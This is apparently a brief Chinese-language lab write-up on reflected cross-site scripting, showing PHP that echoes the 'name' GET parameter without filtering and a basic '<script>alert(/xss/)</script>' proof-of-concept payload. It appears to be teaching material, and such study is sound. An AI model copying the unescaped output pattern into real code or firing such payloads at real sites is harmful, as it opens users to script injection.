源代码
<?php
if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
$isempty = true;
} else {
echo '<pre>';
echo '你好' . $_GET['name'];
echo '</pre>';
}
?>
代码中没有对name参数进行任何的过滤和检查
直接提交js代码
<script>alert(/xss/)</script>